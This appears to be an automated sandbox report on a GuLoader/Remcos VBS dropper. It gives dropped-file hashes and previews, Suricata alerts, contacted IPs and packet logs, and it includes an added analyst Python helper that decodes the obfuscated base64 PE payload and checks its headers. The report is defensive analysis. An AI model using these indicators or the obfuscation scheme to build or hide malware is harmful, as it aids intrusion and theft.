 | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 52.217.196.57, 185.166.143.49
 | https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/preview | malicious | Unknown | 52.217.196.57, 185.166.143.49
                                                                                                      No context
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):144
                                                                                                      Entropy (8bit):3.3603882199736725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rhlKlf4Plxl0cl5JWRal2Jl+7R0DAlBG45klovDl6v:6lfs0U5YcIeeDAlOWAv
                                                                                                      MD5:8C2C5E38697777DA00ED33223219180B
                                                                                                      SHA1:83623E67E4C65B281A9392676934BFCE05464F91
                                                                                                      SHA-256:7853E3096DC1D23741CAA914B9D14795217D78D907EC4F3658E5897E1472650E
                                                                                                      SHA-512:7CE74F8FFBD42BEE89F50F267039E2645368D0F823DE3CC78B3448BDBA3D9CDBE0C1F04809050C0C9B39562A9CC53F17C8D54F30A6F5826694A41A75BCF6F40E
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Preview:....[.2.0.2.4./.1.1./.2.0. .0.3.:.3.6.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):962
                                                                                                      Entropy (8bit):5.01360365253241
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tkluQ+nd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                      MD5:04B89191DF339BF9301F6DDC244CE66B
                                                                                                      SHA1:5E2663E97EFF9ED920A21A1DC6B30254052D5488
                                                                                                      SHA-256:423447CC5328815B686DE0A284415943D2168F2408BD2F76C067626FC2D6CA9F
                                                                                                      SHA-512:D6832DD9147DD08489B97591B35DAA6F127EFE20EDE2A802CF90D84A54F358604D5856C8ACC68B42D2AD2DBADDA2F834292888E865C8A7EA2E9464EED34C61E1
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.890472898059848
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Nlllul3+6l/Z:NllUO6l
                                                                                                      MD5:E948E261B93354B09C4E4FCE93DF4815
                                                                                                      SHA1:E17A8AEF5B768D2748A8B8ACA22A9627755022B8
                                                                                                      SHA-256:03E305403414534E20C77BA999CE52A2FB523D694AB04C9A0A36CD0782DBFA33
                                                                                                      SHA-512:D3673098B587D3E9133F4A7DDC83F2E854DB4CF4974F59A33D2FE025878DA28B14C0EB7E9E78638B602081F0D0B47368861334EDD36DDB0F444BF7CD1EA21E2F
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................&..............@..........
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Three further dropped files, one per additional powershell.exe instance, each identical to the entry above: ASCII text with no line terminators, 60 bytes, entropy 4.038920595031593, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA1 6AB83620379FC69F80C0242105DDFFD7D98D5D9D, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, preview "# PowerShell test file to determine AppLocker lockdown mode", Malicious: false. PowerShell writes this probe file itself at start-up to test whether AppLocker/WDAC places it in constrained language mode; it is a by-product of every powershell.exe launch, not attacker-dropped content.)
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106572
                                                                                                      Entropy (8bit):4.172614770017499
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:B9/ZyG8DTUx9iUs+rFguhnrwqlJI3o7lNi:zxyYiUs+rPEca
                                                                                                      MD5:4F4CC2BAF7A98AA5C29C3B21E48725CF
                                                                                                      SHA1:C25EBCB9B400D9FDAB1655E5666E986731397840
                                                                                                      SHA-256:1FE40914BF08072551BE2995FA32E2567B9B394D0DFDB18A9EA99CC9CF3AF001
                                                                                                      SHA-512:C46A7282C617E78922F2DBD64BBA2BA2161B54320ED04A81428F152D2DD64A001D15B7A18BC2EBA56579D5000D345B13D06C8E140E278F14BE36DFAA87DA5C8C
                                                                                                      Malicious:false
                                                                                                      Preview:TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg$$$$$$$$$$$$$$$$$$Q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$g$$$$$$$$$$4fug4$$t$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$$$$$$$$$$$$$$$$BQRQ$$$$T$$ED$$HvVImc$$$$$$$$$$$$$$$$$$$$O$$$$Ii$$L$$V$$$$$$Ow$$$$$$$$G$$$$$$$$$$$$$$$$bgoB$$$$$$g$$$$$$$$$$$$$$$$$$$$$$$$E$$$$g$$$$$$$$$$g$$$$B$$$$$$$$$$$$$$$$$$$$G$$$$$$$$$$$$$$$$$$$$Bg$$Q$$$$$$g$$$$$$$$$$$$$$$$M$$YIU$$$$B$$$$$$B$$$$$$$$$$$$E$$$$$$E$$$$$$$$$$$$$$$$B$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BgK$$QBT$$$$$$$$$$C$$B$$$$$$E$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$E$$B$$$$w$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$I$$$$$$C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$CC$$$$$$Eg$$$$$$$$$$$$$$$$$$$$$$$$$$$$C50ZXh0$$$$$$$$dOo$$$$$$$$g$$$$$$$$7$$$$$$$$$$I$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$C$$$$$$G$$ucnNyYw$$$$$$$$$$E$$$$$$$$I$$E$$$$$$Q$$$$$$Du$$$$$$$$
                                                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (325), with CRLF line terminators
                                                                                                      Entropy (8bit):3.443268220851559
                                                                                                      TrID:
                                                                                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                      • MP3 audio (1001/1) 33.33%
                                                                                                      File name:sostener.vbs
                                                                                                      File size:3'462'610 bytes
                                                                                                      MD5:619077e3c8387532a2d930e2b86c9ff7
                                                                                                      SHA1:081166adc2aed980d757c61687838f53ecaf4224
                                                                                                      SHA256:3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664
                                                                                                      SHA512:cce42eacddd12c0a541eacb5a772b5a2b70844154c31264b82a846cda4db488d8142e3cb09caada11a16eceae16884577f439892b2c4465d04df9fffbcff3323
                                                                                                      SSDEEP:768:iooooLooooLooooLoooorooooLooooLooooLoooocooooLooooLooooLoooorooi:zDnM
                                                                                                      TLSH:EFF537039C51E00BD6A389A214D6F8F1659C77C6EC584CCE80C376D8E56E7F27B0AE99
                                                                                                      File Content Preview:..........'. .;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@
                                                                                                      Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T09:36:22.318836+0100 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
2024-11-20T09:36:22.318836+0100 | 2020425 | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 | 1 | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
2024-11-20T09:36:22.752887+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
2024-11-20T09:36:22.752887+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 52.217.196.57 | 443 | 192.168.2.7 | 49747 | TCP
2024-11-20T09:36:23.714286+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49759 | 190.9.223.1354576 (IP/port boundary lost in extraction: reads as either 190.9.223.135 / 4576 or 190.9.223.13 / 54576) | TCP
2024-11-20T09:36:24.973348+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.7 | 49769 | 178.237.33.50 | 80 | TCP
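The 106572-byte file dropped by powershell.exe (preview above) is ordinary base64 of a PE image in which every "A" has been written as "$$": undoing that, the preview's "TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg" becomes "TVqQAAMAAAAEAAAA//8AALg", which is exactly how the first bytes of an MZ header (4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00) encode, and the later "4fug4$$t$$nNIbgBTM0hVGhpcyBwcm9ncmFt" is the familiar "4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt" of the DOS stub. The Suricata rules that fired on the 52.217.196.57:443 response ("ReverseLoader", "Reverse Base64 Encoded MZ Header", served with Content-Type text/plain) describe the on-the-wire form of the same payload: the base64 text sent in reverse order. What follows is an added analyst helper, not code from Joe Sandbox or from the sample, that undoes both transformations and then validates the result as a PE (MZ signature, e_lfanew, PE signature, section table) before the blob goes to a disassembler. The "$$" to "A" mapping is read off the preview, the reversal handling is inferred from the rule names only, the 36-character PREVIEW_HEAD is transcribed from the report, and the tiny PE skeleton the example builds is a constructed stand-in for the real file.

```python
"""Recover and sanity-check the base64-wrapped PE payloads in this chain.

Added analyst helper; not code from Joe Sandbox or from the sample.
Assumptions: on disk every 'A' of the base64 text was written as '$$';
on the wire the same text was sent reversed. The PE skeleton built below
is constructed for the example and stands in for the real 106572-byte file.
"""
import base64
import re
import struct
from typing import List


def normalise_b64(text: str, token: str = "$$", letter: str = "A") -> str:
    """Undo the two obfuscations and return clean, padded base64.

    1. substitution: 'token' ('$$', read off the report preview) stands for
       'letter' ('A');
    2. reversal: a PE encodes as 'TVqQ...'; if the text instead ends with
       'QqVT', the loader reversed it before sending, so reverse it back.
    """
    text = text.strip().replace(token, letter)
    if "$" in text:
        raise ValueError("stray '$' left over: substitution is not the assumed one")
    if text.endswith("QqVT") and not text.startswith("TVqQ"):
        text = text[::-1]
    # Drop whitespace or line breaks an HTTP body or a file viewer may add.
    text = re.sub(r"[^A-Za-z0-9+/=]", "", text)
    return text + "=" * (-len(text) % 4)


def decode_payload(text: str) -> bytes:
    return base64.b64decode(normalise_b64(text), validate=True)


def parse_pe_sections(blob: bytes) -> List[str]:
    """Return the section names of a PE image; raise ValueError if the
    DOS/PE headers are not where a genuine image has them."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER
    n_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_size              # first IMAGE_SECTION_HEADER
    if table + 40 * n_sections > len(blob):
        raise ValueError("section table runs past end of image")
    return [blob[table + 40 * i:table + 40 * i + 8].rstrip(b"\0").decode("ascii", "replace")
            for i in range(n_sections)]


def is_pe(blob: bytes) -> bool:
    try:
        parse_pe_sections(blob)
        return True
    except ValueError:
        return False


def build_fake_pe() -> bytes:
    """Constructed stand-in: DOS header, PE signature, COFF header with an
    empty optional header, and two section headers. Not a runnable image."""
    dos = bytearray(0x40)
    dos[:4] = b"MZ\x90\x00"                   # e_magic and e_cblp as in a real stub
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew points at the PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)

    def section(name: bytes) -> bytes:
        return name.ljust(8, b"\0") + bytes(32)

    return bytes(dos) + b"PE\0\0" + coff + section(b".text") + section(b".rsrc")


# First 36 base64 characters transcribed from the report's dropped-file preview.
PREVIEW_HEAD = "TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg" + "$" * 18 + "Q" + "$" * 6

# Constructed inputs in the two forms seen in the report.
ON_DISK = base64.b64encode(build_fake_pe()).decode().replace("A", "$$")
ON_WIRE = base64.b64encode(build_fake_pe()).decode()[::-1]

if __name__ == "__main__":
    print("preview head decodes to:", decode_payload(PREVIEW_HEAD)[:16].hex())
    for label, text in (("dropped file", ON_DISK), ("HTTP body", ON_WIRE)):
        image = decode_payload(text)
        print(f"{label}: {len(image)} bytes, sections {parse_pe_sections(image)}")
```

On the real artefact, read the dropped file, pass its text to decode_payload, hash the result and pivot on that hash; for the HTTP body captured from 52.217.196.57, the same call applies because the reversal is detected from the "QqVT" tail rather than assumed.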
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 09:36:10.142853022 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.147831917 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.147908926 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.150357008 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.155189991 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.858876944 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.858891964 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.858942032 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.858975887 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.858987093 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859028101 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.859071016 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859082937 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859095097 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859107018 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859122992 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.859137058 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.859333038 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859350920 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.859391928 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.866863012 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.866878033 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.866947889 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.987410069 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987441063 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987452030 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987513065 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.987598896 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987610102 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987648010 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.987773895 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987814903 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.987821102 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987832069 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.987869024 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.987926960 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988426924 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988449097 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988461971 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988482952 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.988497972 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.988579035 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988590956 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.988629103 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.989126921 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.989192963 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.989202976 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.989243031 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.989352942 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.989363909 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.989403009 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.990103960 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.990114927 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.990127087 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.990154982 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.990180016 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.992399931 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.992409945 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.992420912 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.992523909 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:10.992542028 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:10.992579937 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.081913948 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116182089 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116203070 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116218090 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116239071 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116241932 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.116254091 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.116261005 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.116326094 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.117563963 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.117580891 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.117595911 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.117643118 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.117645025 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.117659092 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.117682934 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118015051 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118066072 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118082047 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118105888 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118130922 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118185997 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118246078 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118294001 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118309021 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118323088 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118331909 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118355036 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118464947 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118511915 CET | 49699 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:11.118541956 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118582010 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118594885 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
Nov 20, 2024 09:36:11.118609905 CET | 80 | 49699 | 91.202.233.169 | 192.168.2.7
